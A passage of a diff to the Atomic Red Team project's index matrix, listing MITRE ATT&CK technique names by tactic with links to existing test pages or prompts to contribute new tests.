| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | [Software Deployment Tools](../../T1072/T1072.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | | [Video Capture](../../T1125/T1125.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Inter-Process Communication](../../T1559/T1559.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Hypervisor CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | [Cloud Administration Command](../../T1651/T1651.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery](../../T1614/T1614.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Serverless Execution](../../T1648/T1648.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
|
||||
| | | [Time Providers](../../T1547.003/T1547.003.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) | | | | | |
|
||||
| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
|
||||
| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | | |
|
||||
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
|
||||
| | | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
|
||||
@@ -82,51 +82,54 @@
|
||||
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
|
||||
| | | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Authentication Package](../../T1547.002/T1547.002.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
|
||||
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | [BITS Jobs](../../T1197/T1197.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
|
||||
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
|
||||
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
|
||||
| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
|
||||
| | | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
|
||||
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
|
||||
| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
|
||||
| | | vSphere Installation Bundles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
|
||||
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
|
||||
